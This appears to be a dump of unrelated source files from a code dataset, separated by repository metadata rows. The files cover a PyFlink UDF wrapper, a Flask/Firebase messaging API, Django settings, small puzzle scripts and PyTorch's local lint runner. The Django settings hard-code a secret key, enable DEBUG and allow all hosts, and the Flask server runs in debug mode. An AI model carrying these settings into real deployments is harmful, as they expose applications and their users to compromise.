return self.func(*args)
class UserDefinedFunctionWrapper(object):
"""
Wrapper for Python user-defined function. It handles things like converting lambda
functions to user-defined functions, creating the Java user-defined function representation,
etc. It's for internal use only.
"""
def __init__(
self, func, input_types, result_type, deterministic = None, name = None
):
if inspect.isclass(func) or (
not isinstance(func, UserDefinedFunction) and not callable(func)
):
raise TypeError(
'Invalid function: not a function or callable (__call__ is not defined): {0}'.format(
type(func)
)
)
if not isinstance(input_types, collections.Iterable):
input_types = [input_types]
for input_type in input_types:
if not isinstance(input_type, DataType):
raise TypeError(
'Invalid input_type: input_type should be DataType but contains {}'.format(
input_type
)
)
if not isinstance(result_type, DataType):
raise TypeError(
'Invalid returnType: returnType should be DataType but is {}'.format(
result_type
)
)
self._func = func
self._input_types = input_types
self._result_type = result_type
self._judf_placeholder = None
self._name = name or (
func.__name__
if hasattr(func, '__name__')
else func.__class__.__name__
)
if (
deterministic is not None
and isinstance(func, UserDefinedFunction)
and deterministic != func.is_deterministic()
):
raise ValueError(
'Inconsistent deterministic: {} and {}'.format(
deterministic, func.is_deterministic()
)
)
# default deterministic is True
self._deterministic = (
deterministic
if deterministic is not None
else (
func.is_deterministic()
if isinstance(func, UserDefinedFunction)
else True
)
)
def _judf(self, is_blink_planner, table_config):
if self._judf_placeholder is None:
self._judf_placeholder = self._create_judf(
is_blink_planner, table_config
)
return self._judf_placeholder
def _create_judf(self, is_blink_planner, table_config):
func = self._func
if not isinstance(self._func, UserDefinedFunction):
func = DelegatingScalarFunction(self._func)
import cloudpickle
serialized_func = cloudpickle.dumps(func)
gateway = get_gateway()
j_input_types = utils.to_jarray(
gateway.jvm.TypeInformation,
[_to_java_type(i) for i in self._input_types],
)
j_result_type = _to_java_type(self._result_type)
if is_blink_planner:
PythonTableUtils = (
gateway.jvm.org.apache.flink.table.planner.utils.python.PythonTableUtils
)
j_scalar_function = PythonTableUtils.createPythonScalarFunction(
table_config,
self._name,
bytearray(serialized_func),
j_input_types,
j_result_type,
self._deterministic,
_get_python_env(),
)
else:
PythonTableUtils = gateway.jvm.PythonTableUtils
j_scalar_function = PythonTableUtils.createPythonScalarFunction(
self._name,
bytearray(serialized_func),
j_input_types,
j_result_type,
self._deterministic,
_get_python_env(),
)
return j_scalar_function
# TODO: support to configure the python execution environment
def _get_python_env():
gateway = get_gateway()
exec_type = (
gateway.jvm.org.apache.flink.table.functions.python.PythonEnv.ExecType.PROCESS
)
return gateway.jvm.org.apache.flink.table.functions.python.PythonEnv(
exec_type
)
def _create_udf(f, input_types, result_type, deterministic, name):
return UserDefinedFunctionWrapper(
f, input_types, result_type, deterministic, name
)
def udf(
f = None,
input_types = None,
result_type = None,
deterministic = None,
name = None,
):
"""
Helper method for creating a user-defined function.
Example:
::
>>> add_one = udf(lambda i: i + 1, DataTypes.BIGINT(), DataTypes.BIGINT())
>>> @udf(input_types=[DataTypes.BIGINT(), DataTypes.BIGINT()],
... result_type=DataTypes.BIGINT())
... def add(i, j):
... return i + j
>>> class SubtractOne(ScalarFunction):
... def eval(self, i):
... return i - 1
>>> subtract_one = udf(SubtractOne(), DataTypes.BIGINT(), DataTypes.BIGINT())
:param f: lambda function or user-defined function.
:type f: function or UserDefinedFunction or type
:param input_types: the input data types.
:type input_types: list[DataType] or DataType
:param result_type: the result data type.
:type result_type: DataType
:param name: the function name.
:type name: str
:param deterministic: the determinism of the function's results. True if and only if a call to
this function is guaranteed to always return the same result given the
same parameters. (default True)
:type deterministic: bool
:return: UserDefinedFunctionWrapper or function.
:rtype: UserDefinedFunctionWrapper or function
"""
# decorator
if f is None:
return functools.partial(
_create_udf,
input_types = input_types,
result_type = result_type,
deterministic = deterministic,
name = name,
)
else:
return _create_udf(f, input_types, result_type, deterministic, name)
| [
"jinxufang@tencent.com"
] | jinxufang@tencent.com |
6c137c6126c25690c337197affaf147d9e37e27b | e38f7b5d46fd8a65c15e49488fc075e5c62943c9 | /pychron/processing/fits/interpolation_fit_selector.py | d87ba575e0cfa7ff8c9751b69ae6c15e42f3c200 | [] | no_license | INGPAN/pychron | 3e13f9d15667e62c347f5b40af366096ee41c051 | 8592f9fc722f037a61b0b783d587633e22f11f2f | refs/heads/master | 2021-08-15T00:50:21.392117 | 2015-01-19T20:07:41 | 2015-01-19T20:07:41 | 111,054,121 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,377 | py | #===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
#============= enthought library imports =======================
#============= standard library imports ========================
#============= local library imports ==========================
from pychron.processing.fits.fit import Fit
from pychron.processing.fits.fit_selector import FitSelector
from pychron.pychron_constants import FIT_TYPES_INTERPOLATE
class InterpolationFit(Fit):
def _get_fit_types(self):
return FIT_TYPES_INTERPOLATE
class InterpolationFitSelector(FitSelector):
fit_klass = InterpolationFit
fit_types = FIT_TYPES_INTERPOLATE
#============= EOF =============================================
| [
"jirhiker@gmail.com"
] | jirhiker@gmail.com |
2461dd6d31bb8de582e3c2c2b4eb9cae54a7dcf7 | bb65c5e103768ed32a0538389d18d08095a9b101 | /server/main.py | f4f7288368d6a4616071eeb32528ccd0b36e3371 | [] | no_license | DaniloMaglia/WUD | 235b6219cdcda08f4d1551cc1417087afdfbaef7 | 6eb112610d96586bd5bc63b26b64b95b73fe83c8 | refs/heads/master | 2023-09-04T23:38:48.585403 | 2021-11-09T14:23:12 | 2021-11-09T14:23:12 | 415,654,689 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,335 | py | from firebase_admin.exceptions import FirebaseError
from flask import request, Flask
from flask_cors import CORS, cross_origin
from message import Message
from db_driver import APIException, FirebaseConnection
from db_driver import User
from firebase_admin.exceptions import FirebaseError
INVALID_TOKEN = {
"code": "invalid_token",
"message": "Invalid token. Token validity check failed, check if the token is not expired",
}
INVALID_USER = {
"code": "invalid_user",
"message": "Invalid user. The associated username has not been found in the database"
}
INVALID_DEST = {
"code": "invalid_dest",
"message": "The destinatary of the message is not valid, please check the unique id",
}
INVALID_PARAMETER = {
"code": "invalid_parameter",
"message": "You sent invalid parameter to the API, check carefully to see where is the error",
}
USER_EXISTS = {
"code": "user_exists",
"message": "The user (name) you sent is already being used",
}
EMAIL_EXISTS = {
"code": "email_exists",
"message": "The user (email) you sent is already being used",
}
INVALID_LOGIN = {
"code": "invalid_login",
"message": "Invalid email or password"
}
app = Flask(__name__)
cors = CORS(app)
app.config["DEBUG"] = True
fb = FirebaseConnection(
"./res/key/key.json",
"https://whatudoing-default-rtdb.europe-west1.firebasedatabase.app/",
)
@app.route("/post_message", methods=["POST"])
# Route per inviare un messaggio ad un utente.
# Come body prende un json con i seguenti parametri:
# token = token della persona che vuole inviare il messaggio
# dest = id dell'utente a cui è destinato il messaggio
# msg = il messaggio inviato
# Il messaggio verrà messo tra i "pending_message" e potrà
# essere preso solo quando il destinatario richiederà i
# propri messaggi.
@cross_origin()
def post_message():
token = request.json["token"]
dest = request.json["dest"]
msg = request.json["msg"]
try:
user = User.get_user_by_token(fb, token)
except APIException:
return INVALID_TOKEN
try:
user.send_message(fb, dest, msg)
return {"code": "success", "message": "Message sent successfully"}
except User.UserException:
return INVALID_DEST
@app.route("/get_message", methods=["POST"])
# Route per leggere i messaggi ricevuti.
# Come body prende un JSON con i seguenti parametri:
# token = token per la sicurezza
# Verrà ritornato il messaggio con il seguente formato
# {
# src: [src],
# msg: [msg]
# }
# In caso ci siano più messaggi verrà ritornata una lista.
@cross_origin()
def get_message():
print(request.json)
token = request.json[
"token"
] # token ancora da implementare, per ora sarà sostituito da un utente fisso
try:
user = User.get_user_by_token(fb, token)
pending_messages = user.get_pending_messages(fb)
if pending_messages is not None:
return pending_messages
else:
return INVALID_DEST
except APIException:
return INVALID_TOKEN
@app.route("/auth/signup", methods=["POST"])
# Route per aggiungere un utente alla piattaforma
# Utilizza il sistema di autenticazione di Firebase
# Come body prende un JSON con i seguenti parametri:
# username = username dell'utente
# email = email dell'utente
# password = password in chiaro dell'utente
# Restituisce un messaggio con il seguente formato:
# {
# code: "success"
# message: "User created successfully"
# }
@cross_origin()
def signup():
username = request.json["username"]
email = request.json["email"]
password = request.json["password"]
try:
User.sign_up(fb, username, email, password)
return {"code": "success", "message": "User created successfully"}
except User.UserException:
return USER_EXISTS
except FirebaseError:
return EMAIL_EXISTS
@app.route("/auth/signin", methods=["POST"])
# Route per eseguire l'accesso all'API.
# Ritorna un token che potrà essere utilizzato successivamente
# per identificarsi all'interno dell'API.
# Come body richiede un JSON con i seguenti paramentri:
# email: [email],
# password: [password]
# Verrà restituito un messaggio con il seguente formato
# {
# code: "success",
# message: "User signed in successfully",
# token: [token]
# }
@cross_origin()
def signin():
email = request.json["email"]
password = request.json["password"]
try:
token = User.sign_in(email, password)
return {
"code": "success",
"message": "User signed in successfully",
"token": token,
}
except APIException:
return INVALID_PARAMETER
except User.UserException:
return INVALID_LOGIN
@app.route("/user/get", methods=["POST"])
# Route per prendere i dati di un utente
# Come body richiede un JSON con i seguenti parametri:
# token = token che identifica la sessione di un utente (vedere signin)
# Verrà restituito un messaggio con il seguente formato
# {
# code: "success",
# message: "User retrieved successfully",
# user: {
# username: [username],
# email: [email]
# }
# }
@cross_origin()
def get_user():
token = request.json["token"]
try:
user = User.get_user_by_token(fb, token)
return {
"code": "success",
"message": "User retrieved sucessfully",
"user": user.__dict__(),
}
except APIException:
return INVALID_TOKEN
@app.route("/user/get_by_username", methods=["POST"])
# Route per prendere i dati di un utente
# Come body richiede un JSON con i seguenti parametri:
# username = username dell'utente da cercare
# Verrà restituito un messaggio con il seguente formato
# {
# code: "success",
# message: "User retrieved successfully",
# user: {
# username: [username],
# email: [email]
# }
# }
@cross_origin()
def get_user_by_username():
username = request.json["username"]
try:
user = User.get_user_by_username(fb, username)
return {
"code": "success",
"message": "User retrieved sucessfully",
"user": user.__dict__(),
}
except APIException:
return INVALID_USER
def main():
app.run(host="0.0.0.0", port=42069)
if __name__ == "__main__":
main()
| [
"magliadanilo@gmail.com"
] | magliadanilo@gmail.com |
7a77b149db2c726037c8e1a03596ff93526b0641 | 3dc08fff8e43e94154ae247d5f5d8588d63b49ec | /2017/AdvCodeDay4.py | 73e0c95fff34f92894be54525f462dc9bb6287c4 | [] | no_license | rwinklerwilkes/Advent-of-Code | 4ad5a51b83ebc1b1faa4c32e9e61d1f4f288b4ad | 45470f966ae33aa8a753fb2d81f3ddc9299817b9 | refs/heads/master | 2022-03-22T11:15:58.183224 | 2019-12-30T15:37:56 | 2019-12-30T15:37:56 | 114,539,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | ##Day Four
def bad_phrase(phrase):
s = phrase.split()
s = sorted(s)
dup = False
for i in range(len(s)-1):
if s[i]==s[i+1]:
dup = True
return dup
def bad_phrase_anagram(phrase):
s = phrase.split()
s = [''.join(sorted(word)) for word in s]
s = sorted(s)
dup = False
for i in range(len(s)-1):
if s[i]==s[i+1]:
dup = True
return dup
def good_passphrases(pass_input):
ctr = 0
for phrase in pass_input:
if not bad_phrase(phrase):
ctr += 1
return ctr
def good_passphrases_anagram(pass_input):
ctr = 0
for phrase in pass_input:
if not bad_phrase_anagram(phrase):
ctr += 1
return ctr
file = "Passphrase Input.txt"
passphrases = []
with open(file, 'r') as txtfile:
for row in txtfile:
passphrases.append(row.strip())
part_one = good_passphrases(passphrases)
part_two = good_passphrases_anagram(passphrases)
| [
"rich.w.sas@gmail.com"
] | rich.w.sas@gmail.com |
cd516a41afabb0cb99bb296211788b5dff0347b6 | cfc345aa7ec01a1ab111004d6f1bb52c7baca293 | /split_folders.py | 297fd22620ecb56194a53acad6b4fe4540af4888 | [] | no_license | iamgroot42/dlvr_project | 70ce20675c8f1ba218aa3333f24c622def6c88bd | 62aa8c24448b0aaee35df09a757527606f09f8bf | refs/heads/master | 2022-06-02T06:34:55.770882 | 2020-05-04T23:22:55 | 2020-05-04T23:22:55 | 259,161,559 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,700 | py | import os
import random
from shutil import copyfile
from tqdm import tqdm
if __name__ == "__main__":
# Train-Test Split Ratio
split_ratio = 0.7
source_datapath = "./finegrained_data/"
destn_datapath = "./finegrained_data_split/"
print("[Start] Data Split and Shifting")
for basepath in os.listdir(source_datapath):
bp = os.path.join(source_datapath, basepath)
# Make directory for class
os.mkdir(os.path.join(destn_datapath, basepath))
# Make train, test directories inside class
os.mkdir(os.path.join(destn_datapath, basepath, "train"))
os.mkdir(os.path.join(destn_datapath, basepath, "test"))
for folder in tqdm(os.listdir(bp)):
concept = os.path.join(bp, folder)
# Shuffle list
files = os.listdir(concept)
random.shuffle(files)
# Split into train-test
split_point = int(len(files) * split_ratio)
train_files, test_files = files[:split_point], files[split_point:]
# Make directory for class
dest_concept_path = os.path.join(destn_datapath, basepath)
os.mkdir(os.path.join(dest_concept_path, "train", folder))
os.mkdir(os.path.join(dest_concept_path, "test", folder))
# Copy into destination folder to respectrive train/test directories
for file in train_files:
copyfile(os.path.join(concept, file), os.path.join(dest_concept_path, "train", folder, file))
for file in test_files:
copyfile(os.path.join(concept, file), os.path.join(dest_concept_path, "test", folder,file))
print("[End] Data Split and Shifting")
| [
"anshuman@email.virginia.edu"
] | anshuman@email.virginia.edu |
cdba6787cb45d6b039a3639d858ae0c457771963 | 9773059260c1f9395d182f7a65760b0917794a7f | /venv/bin/easy_install | 7b6db3a0dec0c3e534d13076015638fb1340631b | [] | no_license | Ruldane/DjangoCountWords | 05a452db5640b0efbff8f8e75061ed8dc2a40f6e | e54efb72caf678b7682642ce29b54b7d68170fa2 | refs/heads/master | 2020-06-10T19:50:41.289276 | 2019-06-25T14:54:39 | 2019-06-25T14:54:39 | 193,728,073 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 443 | #!/home/ruldane/PycharmProjects/countword/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"l.nizzoli@gmail.com"
] | l.nizzoli@gmail.com | |
e3187338366529c0db25978df2bdc1b5d1708f9a | b5025befdf74fff3071252abaa4db09479f2d763 | /Aneena/Aug10/employee.py | d431fdd12490188cde22d81218f2acfc45dceeee | [] | no_license | sidv/Assignments | d2fcc643a2963627afd748ff4d690907f01f71d8 | d50d668264e2a31581ce3c0544f9b13de18da2b3 | refs/heads/main | 2023-07-30T02:17:19.392164 | 2021-09-23T04:47:56 | 2021-09-23T04:47:56 | 392,696,356 | 1 | 20 | null | 2021-09-23T08:14:11 | 2021-08-04T13:20:43 | Python | UTF-8 | Python | false | false | 971 | py |
employee = []
while True:
print("1.Add employee")
print("2.Delete employee")
print("3.Search employee")
print("4.Change employee data")
print("5.Display all employee details")
print("6.Exit")
choice = int(input("enter your choice\n"))
if choice == 1:
name=input("Enter the employee name\n")
if name != None:
employee.append(name)
if choice == 2:
print(employee)
print("Choose the employee name to delete")
name=input("Enter the employee name to delete\n")
employee.remove(name)
if choice == 3:
name=input("Enter the name to search\n")
if name in employee:
print(name + "is in the list\n")
else:
print(name + "is not in the list\n")
if choice == 4:
name = input("Enter the name to be changed\n")
index = employee.index(name)
new_name = input("Enter the new_name\n")
employee[index] = new_name
if choice == 5:
#print(employee)
x=1
for i in employee:
print (str(x) + "." + i)
x += 1
if choice == 6:
break;
| [
"anee1234@gmail.com"
] | anee1234@gmail.com |
46780ffe28ee6581b83e37f84a8955507f9583fc | 80ae9b5cfb45b6e9cf7873ef7c46e17e117e4019 | /data/HackerRank-Mathematics/Constructing a Number.py | c87d42e4fdaa23fd44e0b8922ae34ab56bbcd61e | [] | no_license | Ritvik19/CodeBook | ef7764d89b790e902ede5802f36d5ca910d8a50e | 2b4ed7938bbf156553d6ba5cba6216449528f0fc | refs/heads/master | 2021-07-04T08:25:52.478719 | 2020-08-08T06:54:14 | 2020-08-08T06:54:14 | 138,744,302 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | #!/bin/python3
import math
import os
import random
import re
import sys
def canConstruct(a):
return "Yes" if sum(a) % 3 == 0 else "No"
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
t = int(input())
for t_itr in range(t):
n = int(input())
a = list(map(int, input().rstrip().split()))
result = canConstruct(a)
fptr.write(result + '\n')
fptr.close()
| [
"rastogiritvik99@gmail.com"
] | rastogiritvik99@gmail.com |
4abb7fabbd57ff0a857464e0b5557d97d45f5452 | 7a9034fa0698e9b6481c5de35ffd91c96d7552e9 | /personal_site/settings.py | 744f94f86bf4b5ecbb9947fff3a52102ef65e017 | [] | no_license | k4u5h4L/personal_site | 0e3144b62d9be0e08cf803cc5378c75f40425735 | 807867332e9bca759e2de8a28eb1840d2dd6a451 | refs/heads/main | 2023-02-07T07:52:11.031056 | 2020-12-19T16:36:38 | 2020-12-19T16:36:38 | 322,577,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,785 | py | """
Django settings for personal_site project.
Generated by 'django-admin startproject' using Django 3.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
import json
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '&q_x8wc#6ahgx(yk58au#nide7=58-xd$h)^0=x-g)&r+=x)mb'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'portfolio',
'users',
'blog',
'django_filters',
'crispy_forms',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'personal_site.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'personal_site.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, "blog/static")
APPEND_SLASH = False
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
MEDIA_URL = '/media/'
AUTH_USER_MODEL = 'users.CustomUser'
LOGIN_URL = 'landing_page'
LOGIN_REDIRECT_URL = 'home_page'
LOGOUT_REDIRECT_URL = 'landing_page'
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_PORT = 587
with open(f'{os.getcwd()}/personal_site/config.json') as fp:
email_cred = json.load(fp)
EMAIL_HOST_USER = email_cred['EMAIL_USR']
EMAIL_HOST_PASSWORD = email_cred['EMAI_PASSWD']
EMAIL_USE_TLS = True
| [
"kaushal.v.bhat@gmail.com"
] | kaushal.v.bhat@gmail.com |
19238e70fd393bcd03742fde34353046b147ce19 | 14ccb6cc40980fe25440da3a18a113e8bcdf4efa | /blog/migrations/0001_initial.py | f1ea14304585cadb4806b86bf11a38c632191a98 | [] | no_license | BatoAlvin/koola | 1bc433aa4fa1a0d3f91221260c51242d5eea0692 | 0015565ec44428097ca1a4e9dcf19e7b3dbd33ff | refs/heads/master | 2023-02-23T13:20:51.459968 | 2021-01-21T19:17:38 | 2021-01-21T19:17:38 | 331,552,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,277 | py | # Generated by Django 3.1.5 on 2021-01-20 19:06
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Destination',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=100)),
('first_name', models.CharField(max_length=100)),
('last_name', models.CharField(max_length=100)),
('email', models.CharField(max_length=100)),
('password1', models.CharField(max_length=100)),
('password2', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='Employee',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('amount', models.IntegerField()),
('date', models.DateField(blank=True)),
('location', models.CharField(max_length=100)),
('occupation', models.CharField(max_length=100)),
],
),
]
| [
"alvinbato112@gmail.com"
] | alvinbato112@gmail.com |
16f2f9490ec4a93471d45983ce6e3dc1fb71d1e2 | 2a03132e5742ea5d4012327194bc7ec4e7096194 | /tools/actions_local_runner.py | 4082abda527b90fe1b0a7da2a316ef5323d1dabd | [
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] | permissive | jmnarloch/pytorch | 11f7be7b6d47b11868ede673879f651084f4e976 | 74c12da4517c789bea737dc947d6adc755f63176 | refs/heads/master | 2023-05-05T07:40:18.135517 | 2021-05-24T04:34:55 | 2021-05-24T04:36:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,495 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import subprocess
import sys
import os
import argparse
import yaml
import asyncio
import shutil
import re
import fnmatch
import shlex
import configparser
from typing import List, Dict, Any, Optional, Tuple, Union
REPO_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
class col:
HEADER = "\033[95m"
BLUE = "\033[94m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
RED = "\033[91m"
RESET = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
def should_color() -> bool:
return hasattr(sys.stdout, "isatty") and sys.stdout.isatty()
def color(the_color: str, text: str) -> str:
if should_color():
return col.BOLD + the_color + str(text) + col.RESET
else:
return text
def cprint(the_color: str, text: str) -> None:
if should_color():
print(color(the_color, text))
else:
print(text)
def git(args: List[str]) -> List[str]:
p = subprocess.run(
["git"] + args,
cwd=REPO_ROOT,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True,
)
lines = p.stdout.decode().strip().split("\n")
return [line.strip() for line in lines]
def find_changed_files() -> List[str]:
untracked = []
for line in git(["status", "--porcelain"]):
# Untracked files start with ??, so grab all of those
if line.startswith("?? "):
untracked.append(line.replace("?? ", ""))
# Modified, unstaged
modified = git(["diff", "--name-only"])
# Modified, staged
cached = git(["diff", "--cached", "--name-only"])
# Committed
merge_base = git(["merge-base", "origin/master", "HEAD"])[0]
diff_with_origin = git(["diff", "--name-only", merge_base, "HEAD"])
# De-duplicate
all_files = set()
for x in untracked + cached + modified + diff_with_origin:
stripped = x.strip()
if stripped != "" and os.path.exists(stripped):
all_files.add(stripped)
return list(all_files)
def print_results(job_name: str, passed: bool, streams: List[str]) -> None:
header(job_name, passed)
for stream in streams:
stream = stream.strip()
if stream != "":
print(stream)
async def shell_cmd(
cmd: Union[str, List[str]],
env: Optional[Dict[str, Any]] = None,
redirect: bool = True,
) -> Tuple[bool, str, str]:
if isinstance(cmd, list):
cmd_str = ' '.join(shlex.quote(arg) for arg in cmd)
else:
cmd_str = cmd
proc = await asyncio.create_subprocess_shell(
cmd_str,
shell=True,
cwd=REPO_ROOT,
env=env,
stdout=subprocess.PIPE if redirect else None,
stderr=subprocess.PIPE if redirect else None,
executable=shutil.which("bash"),
)
stdout, stderr = await proc.communicate()
passed = proc.returncode == 0
if not redirect:
return passed, "", ""
return passed, stdout.decode().strip(), stderr.decode().strip()
def header(name: str, passed: bool) -> None:
PASS = color(col.GREEN, "✓")
FAIL = color(col.RED, "x")
icon = PASS if passed else FAIL
print(f"{icon} {color(col.BLUE, name)}")
def get_flake_excludes() -> List[str]:
config = configparser.ConfigParser()
config.read(os.path.join(REPO_ROOT, ".flake8"))
excludes = re.split(r',\s*', config["flake8"]["exclude"].strip())
excludes = [e.strip() for e in excludes if e.strip() != ""]
return excludes
async def run_flake8(files: Optional[List[str]], quiet: bool) -> bool:
cmd = ["flake8"]
excludes = get_flake_excludes()
def should_include(name: str) -> bool:
for exclude in excludes:
if fnmatch.fnmatch(name, pat=exclude):
return False
if name.startswith(exclude) or ("./" + name).startswith(exclude):
return False
return True
if files is not None:
files = [f for f in files if should_include(f)]
if len(files) == 0:
print_results("flake8", True, [])
return True
# Running quicklint, pass in an explicit list of files (unlike mypy,
# flake8 will still use .flake8 to filter this list by the 'exclude's
# in the config
cmd += files
passed, stdout, stderr = await shell_cmd(cmd)
print_results("flake8", passed, [stdout, stderr])
return passed
async def run_mypy(files: Optional[List[str]], quiet: bool) -> bool:
env = os.environ.copy()
if should_color():
# Secret env variable: https://github.com/python/mypy/issues/7771
env["MYPY_FORCE_COLOR"] = "1"
if files is not None:
# Running quick lint, use mypy-wrapper instead so it checks that the files
# actually should be linted
passed, stdout, stderr = await shell_cmd(
[sys.executable, "tools/mypy_wrapper.py"] + [
os.path.join(REPO_ROOT, f) for f in files
],
env=env,
)
print_results("mypy (skipped typestub generation)", passed, [
stdout + "\n",
stderr + "\n",
])
return passed
# Not running quicklint, so use lint.yml
_, _, _ = await shell_cmd(
[
sys.executable,
"tools/actions_local_runner.py",
"--job",
"mypy",
"--file",
".github/workflows/lint.yml",
"--step",
"Run autogen",
],
redirect=False,
env=env,
)
passed, _, _ = await shell_cmd(
[
sys.executable,
"tools/actions_local_runner.py",
"--job",
"mypy",
"--file",
".github/workflows/lint.yml",
"--step",
"Run mypy",
],
redirect=False,
env=env,
)
return passed
async def run_shellcheck(files: Optional[List[str]], quiet: bool) -> bool:
if files is not None:
# The files list should already be filtered by '--file-filter ".sh"' when
# calling this script
passed, stdout, stderr = await shell_cmd(
["tools/run_shellcheck.sh"] + [
os.path.join(REPO_ROOT, f) for f in files
],
)
print_results("shellcheck: Run ShellCheck", passed, [
stdout + "\n",
stderr + "\n",
])
return passed
# Not running quicklint, so use lint.yml
passed, _, _ = await shell_cmd(
[
sys.executable,
"tools/actions_local_runner.py",
"--job",
"shellcheck",
"--file",
".github/workflows/lint.yml",
"--step",
"Run ShellCheck",
],
redirect=False,
)
return passed
async def run_step(
step: Dict[str, Any], job_name: str, files: Optional[List[str]], quiet: bool
) -> bool:
env = os.environ.copy()
env["GITHUB_WORKSPACE"] = "/tmp"
script = step["run"]
if quiet:
# TODO: Either lint that GHA scripts only use 'set -eux' or make this more
# resilient
script = script.replace("set -eux", "set -eu")
script = re.sub(r"^time ", "", script, flags=re.MULTILINE)
name = f'{job_name}: {step["name"]}'
passed, stderr, stdout = await shell_cmd(script, env=env)
if not passed:
print_results(name, passed, [stdout, stderr])
else:
print_results(name, passed, [])
return passed
async def run_steps(
steps: List[Dict[str, Any]], job_name: str, files: Optional[List[str]], quiet: bool
) -> bool:
coros = [run_step(step, job_name, files, quiet) for step in steps]
return all(await asyncio.gather(*coros))
def relevant_changed_files(file_filters: Optional[List[str]]) -> Optional[List[str]]:
changed_files: Optional[List[str]] = None
try:
changed_files = sorted(find_changed_files())
except Exception:
# If the git commands failed for some reason, bail out and use the whole list
print(
"Could not query git for changed files, falling back to testing all files instead",
file=sys.stderr,
)
return None
if file_filters is None:
return changed_files
else:
relevant_files = []
for f in changed_files:
for file_filter in file_filters:
if f.endswith(file_filter):
relevant_files.append(f)
break
return relevant_files
def grab_specific_steps(
steps_to_grab: List[str], job: Dict[str, Any]
) -> List[Dict[str, Any]]:
relevant_steps = []
for step in steps_to_grab:
for actual_step in job["steps"]:
if actual_step["name"].lower().strip() == step.lower().strip():
relevant_steps.append(actual_step)
break
if len(relevant_steps) != len(steps_to_grab):
raise RuntimeError(f"Missing steps:\n{relevant_steps}\n{steps_to_grab}")
return relevant_steps
def main() -> None:
parser = argparse.ArgumentParser(
description="Pull shell scripts out of GitHub actions and run them"
)
